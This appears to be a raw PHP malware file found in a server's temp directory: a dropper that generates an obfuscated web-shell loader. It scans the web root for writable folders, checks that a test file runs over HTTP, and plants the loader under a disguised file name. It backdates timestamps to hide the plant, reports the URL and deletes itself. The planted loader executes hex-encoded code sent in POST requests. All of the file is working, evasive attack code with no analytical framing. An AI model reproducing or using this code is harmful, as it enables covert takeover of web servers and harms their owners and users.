| Current File : //tmp/20250826-094834-aK2C8mi6MXr5C2Voarg7kAAAAAQ-file-gKlqPI |
<?php
@ini_set('error_log', NULL);
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
@error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time', 0);
@ini_set('magic_quotes_runtime', 0);
@date_default_timezone_set('UTC');
echo '<status>';
echo('__spam__');
echo('__check__');
echo '</status>';
// load
function randomName(){ return substr(str_shuffle(str_repeat('abcdefghijklmnopqrstuvwxyz_', 1)), 0, rand(1, 9)); }
function c($o)
{
if(is_array($o))
foreach($o as $k => &$v) $v = c($v);
if(is_string($o))
$o = implode('', array_map(function($s){return rand(0, 1) ? strtolower($s) : strtoupper($s);}, str_split($o)));
return $o;
}
function j()
{
$l = rand(10, 50);
while(!isset($c[$l])) @$c .= chr(rand(32, 126));
if(rand(0, 1))
return preg_replace("|\?>|", "", ((rand(0, 1) ? "#".chr(rand(32, 90)) : "//").$c.(rand(0, 1) ? "\r" : "\n")));
else
return (rand(0, 1) ? "/*".preg_replace("|\*/|","", $c)."*/" : (rand(0, 1) ? "\t".j() : " ".j()));
}
function r()
{
$r = func_get_args();
return c($r[rand(0, (func_num_args() - 1))]);
}
function t($s)
{
foreach(token_get_all($s) as $t)
@$r .= (is_array($t) ? $t[1] : $t).j();
return $r;
}
function varReplace($code, $vars)
{
foreach($vars as $var)
{
$new_var = c(randomName());
$code = str_ireplace('$'.$var, '$'.$new_var, $code);
}
$code = str_ireplace('$_SERVER', '$_SERVER', $code);
$code = str_ireplace('HTTP_ENCODING_CONTENT', 'HTTP_ENCODING_CONTENT', $code);
$code = str_ireplace('error', 'error', $code);
$code = str_ireplace('"uri"', '"uri"', $code);
$code = str_ireplace('"H*"', '"H*"', $code);
return $code;
}
$vars = array('content', 'file_var', 'tmpfile', 'meta', 'pos');
function scriptGenerator()
{
$code = '<?'.c('php').implode('', array_rand(array_flip(["\n","\r","\t"," ", "", chr(9)]), rand(2, 5))).r(j(), '');
$code .= r('$content = file_get_contents("php://input")',
'$file_var = fopen("php://input", "r"); $content = fgets($file_var); fclose($file_var)',
'$file_var = fopen("php://input", "r"); $content = stream_get_contents($file_var); fclose($file_var)',
'$file_var = file("php://input"); $content = $file_var[0]');
$code .= ';
if(!empty($content) && $content = explode("=", $content, 2))
{
$tmpfile = tmpfile();
$meta = stream_get_meta_data($tmpfile);
$pos = @$_SERVER["HTTP_ENCODING_CONTENT"];
$pos = ($pos && $pos == 2) ? 0 : 1;
'.r('fwrite($tmpfile', 'file_put_contents($meta["uri"]').', pack("H*", $content[$pos]));
'.r('include', 'require').r('_once', '').'($meta["uri"]);
}
else die("error");';
return $code;
}
$script_obf = t(c(scriptGenerator()));
$body = varReplace($script_obf, $vars);
$homedir=@$_SERVER['DOCUMENT_ROOT'];
// Определение хоста
if(isset($_SERVER['HTTPS'])) $scheme = $_SERVER['HTTPS'];
else $scheme = '';
if($scheme && $scheme != '' && $scheme != 'off') $host = 'https://'.$_SERVER['HTTP_HOST'];
else $host = 'http://'.$_SERVER['HTTP_HOST'];
$homedir = @$_SERVER['DOCUMENT_ROOT'];
if($handle = opendir($homedir)) // First
{
while (false !== ($file = readdir($handle)))
{
if($file == "." or $file == "..") continue;
if(filetype($homedir.DIRECTORY_SEPARATOR.$file) == "dir") $root_dirs[$file]=$homedir.DIRECTORY_SEPARATOR.$file;
}
shuffle($root_dirs);
foreach($root_dirs as $root_name => $root_dir)
$result[$root_name] = scan($root_dir);
if(count($result) > 0)
foreach($result as $info)
{
if(!isset($info['dir']) || count(@$info['dir']) == 0) continue;
if(!isset($info['file']) || count(@$info['file']) == 0) continue;
$info['dir'] = array_unique($info['dir']);
shuffle($info['dir']);
$info['file'] = array_unique($info['file']);
shuffle($info['file']);
foreach($info['dir'] as $random_dir)
{
foreach($info['file'] as $random_file)
{
if(count($info['dir']) == 1 && $try_random == '1')
{
$suffix = array('_', '.old', '_old', 'old', 'bak', '.bak', '_bak', '1', '2', '3', '_1', '_2', '_3', '.1', '.2', '.3');
shuffle($suffix);
$replace = $suffix[0].'.php';
$random_file = preg_replace('/\.php$/i', $replace, $random_file);
}
$random_path = $random_dir.DIRECTORY_SEPARATOR.'t_s_'.$random_file;
if(!is_file($random_dir.DIRECTORY_SEPARATOR.$random_file))
{
if(is_writable($random_dir))
{
$dir_time = filemtime($random_dir);
if($handle = opendir($random_dir))
{
$old_time = microtime(1);
while (false !== ($file = readdir($handle)))
{
if($file == "." or $file == "..") continue;
$filemt = filemtime($random_dir.DIRECTORY_SEPARATOR.$file);
if($filemt < $old_time) $old_time = $filemt;
}
$old_time = ($dir_time < $old_time) ? $dir_time : $old_time;
$test_str = '<?php echo md5(23); ?>';
if(file_put_contents($random_path, $test_str))
{
$url = $host.str_replace('\\','/',str_replace($homedir,'',$random_path));
if($content = get($url))
{
if(preg_match('/'.md5(23).'/', $content))
{
unlink($random_path);
$random_path = str_replace('t_s_', '', $random_path);
if(file_put_contents($random_path, $body))
{
chmod($random_path, 0755);
touch($random_path, $old_time);
touch($random_dir, $dir_time);
endik(str_replace('/t_s_', '/', $url));
}
else endik('re_error_write');
}
}
if(file_exists($random_path))
{
unlink($random_path);
touch($random_dir, $dir_time);
}
}
}
}
break(1);
}
}
}
}
}
if(is_writable(dirname($_SERVER['SCRIPT_FILENAME']))) // Second
{
$old_time = (filemtime("./") < filemtime("../")) ? filemtime("./") : filemtime("../");
$file = dirname($_SERVER['SCRIPT_FILENAME']).'/input.php';
if(file_put_contents($file, $body))
{
touch($file, $old_time);
$url_path = str_replace('//', '/', dirname($_SERVER['PHP_SELF']).'/input.php');
endik($host.$url_path);
}
else endik('re_error_write');
}
else endik('re_error_right');
function scan($homedir, $count=0, $files=array())
{
$scan_max = 2;
$subdir = array();
if($count > $scan_max) return $files;
if($handle = opendir($homedir))
{
$files['dir'][] = $homedir;
while(false !== ($file = readdir($handle)))
{
if($file == "." or $file == "..") continue;
$fullPath = $homedir.DIRECTORY_SEPARATOR.$file;
if(filetype($fullPath) == "dir")
{
$files['dir'][] = $fullPath;
$subdir[] = $fullPath;
}
elseif(!preg_match('#(index\.php|admin\.php)#', $file) and preg_match('/\.php$/i', $file)) $files['file'][] = $file;
}
++$count;
if(count($subdir) > 0)
foreach($subdir as $dir) $files = scan($dir, $count, $files);
}
return $files;
}
function get($url)
{
if(is_callable("curl_exec"))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0');
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$content = curl_exec($ch);
curl_close($ch);
return $content;
}
elseif(is_callable("file_get_contents") && filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN))
{
return file_get_contents($url, false, stream_context_create(array(
"ssl" => array("verify_host" => false,
"verify_peer" => false,
"verify_peer_name" => false,
"allow_self_signed" => true
),
"http" => array(
"header" => "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0"
)
)));
}
elseif(is_callable("fsockopen"))
{
if($fp = fsockopen(parse_url($url, PHP_URL_HOST), 80, $e, $e, 15))
{
$out ="GET ".parse_url($url, PHP_URL_PATH)." HTTP/1.1\r\n";
$out.="Host: ".parse_url($url, PHP_URL_HOST)."\r\n";
$out.="User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0\r\n";
$out.="\r\n";
fputs($fp, $out);
$content = '';
while(!feof($fp)) {
$content .= fgets($fp, 1024);
}
fclose($fp);
return $content;
}
else return false;
}
else return false;
}
function get_data($socket) {
$smtp_msg = '';
while ($line = fgets($socket, 515)) {
$smtp_msg .= $line;
if(substr($line, 3, 1) == " ") break;
}
return ($smtp_msg);
}
function endik($msg) {
@unlink(__FILE__);
$result = '<result>'.$msg.'</result>';
die($result);
}
?>